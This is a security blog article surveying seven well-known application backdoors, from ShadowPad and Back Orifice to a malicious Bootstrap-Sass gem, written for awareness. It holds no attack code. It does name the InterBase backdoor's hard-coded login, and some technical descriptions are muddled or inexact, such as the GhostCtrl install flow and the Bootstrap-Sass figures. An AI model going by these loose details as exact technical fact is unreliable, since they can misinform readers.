Application security

7 most common application backdoors

Dan Virgillito
September 9, 2019 by
Dan Virgillito

The popular adage “we often get in quicker by the back door than the front” has withstood the test of time even in our advanced, modern world. Application backdoors have become rampant in today’s business environment, making it mandatory for us to take the same level of precaution we’d do to safeguard the backdoor of our homes.

In this article, we’ll explore and explain the most common backdoors you may encounter while using an application.

11 courses, 8+ hours of training

11 courses, 8+ hours of training

Learn cybersecurity from Ted Harrington, the #1 best-selling author of "Hackable: How to Do Application Security Right."

1. ShadowPad

Back in 2017, security researchers discovered an advanced backdoor integrated into the server management applications of South Korea- and U.S.-based NetSarang. Dubbed ShadowPad, the backdoor has the ability to download and install additional malware as well as spoof data. If the data transmitted to the backdoor creators were of any interest, their C&C (command and control) servers would respond by triggering the backdoor’s function to execute additional payloads.

This attack hinted for the need to stay vigilant against enterprise application backdoors where critical data in a corporate application is compromised in order to gain open access on the software for process creation, surveillance and theft.

2. Back Orifice

Developed in 1998, the Back Orifice backdoor enabled its creators to remotely control systems running Microsoft Windows. The idea was to demonstrate underlying security problems in Microsoft Windows 98, so it had abilities such as being able to hide itself within the application.

This was commended by the majority of cybercriminals who managed to use Back Orifice as a malicious payload. The payload creates a copy of itself in the system directory of the Windows application as well as inserting a value containing its filename to the Windows registry below the key. The backdoor even has a successor in the shape of BO2K (Back Orifice 2000), which enables unauthorized access to Windows Vista and XP.

3.  Android APK backdoor

There is no shortage of Android security threats out there, but it’s not often that users encounter a threat that can do as much as a malicious APK. Researchers at Trend Micro discovered an Android backdoor that can not only steal all types of data, but also take full control of the Android handset.

Named GhostCtrl, the backdoor typically masquerades as a legitimate app (e.g., WhatsApp) and base64-decodes a string from the app’s resource file and writes it down, which is a malicious APK. The APK, once dynamically clicked by wrapper variant, asks the user to install it. Avoiding it is a big challenge: even if the user cancels the prompt that says “ask for install page,” the message still shows up immediately.

Reports also reveal that the backdoor is often used in conjunction with the data-spoofing RETADUP worm, which targets Windows devices.

4. Borland/Inprise InterBase backdoor

A backdoor was present in Borland/Inprise’s renowned Interbase database application from 1994-2001. It was the work of Borland’s own engineers (yikes!) and potentially exposed thousands of database at government agencies and organizations to manipulation and unauthorized access over the internet.

Another astonishing aspect of it was the credentials that were used to create the backdoor. The account name “politically” and the password “correct” unlocked access to Interbase 4.0, 5.0 and 6.0 on any platform over the internet.

Additionally, because Interbase has the capability to initiate user-defined actions, the backdoor could be used to insert malicious code into the application, which could give an adversary administrative access to the system running it.

The backdoor also created a threat for companies using the Interbase database application, including NASA, Boeing, Nokia, Bear Stearns, the Money Store, NCI and Northern Telecom.

5. Malicious chrome and Edge extension backdoor

This one is guaranteed to raise an internet user’s hairs. Researchers at Trend Micro recently identified a Chrome and Edge browser extension that creates a powerful backdoor to steal data from browsers and track user activities.

The filenames and submission sources of the involved payloads are thought to be distributed by a group of threat actors from Moldova. Once a user opens a webpage, the extension in question will send the HTTP referrer information and website URL to the C&C server, which can then transmit any malicious code back. The extension can then execute the code on the webpage. It can also sniff particular activities such as choosing items from a drop-down menu, typing something into a form on the web page and clicking buttons.

Backdoors like these call for greater precautions when it comes to using browser extensions for different means.

6. Backdoors in outdated WordPress plugins

Many people consider WordPress to be one of the best content management systems out there, but its posture on security leaves a lot to be desired. One of the greatest threats faced by the CMS is the injection of malicious code in its JavaScript or PHP code.

In many cases, malware authors gain access to WordPress websites through vulnerabilities in outdated plugins and themes. Security researchers at Sucuri found that some adversaries plant a backdoor to make changes to the site’s code and gain future access. Most of these backdoors are obfuscated so well that even expert WordPress users might face difficulties detecting them.

Although JavaScript and PHP files are the main target of threat actors, it’s not unusual for them to make modifications to database tables as well.

7. Bootstrap-Sass Ruby library backdoor

This backdoor has affected approximately 28 million users to date. Discovered by security company Snyk, the threat was added to a malicious variant of web development application Bootstrap-SaaS which has been published on the RubyGems repository.

This backdoor, when integrated inside Ruby or Ruby on Rails (a Ruby framework), would launch a cookie application and share its content. It was secretly placed in a file called lib/active-controller/middleware.rb, which communicates with another Ruby module and changes it so that certain cookies sent by the user are Base64-decoded and then analyzed in runtime for smoother execution of remote code.

While the backdoor was removed from RubyGems later on, server-side Ruby applications remain a prime target for threat creators.

Conclusion

Backdoors present a lot of complicated problems for application users. Because most of them are designed to go undetected, you may unknowingly use software that grants adversaries access to your PC or device. Hopefully, acquiring knowledge of the most common application backdoors in existence will help you make better decisions as to what apps to install and what software to test for vulnerabilities.

Sources

Dan Virgillito
Dan Virgillito

Dan Virgillito is a blogger and content strategist with experience in cyber security, social media and tech news.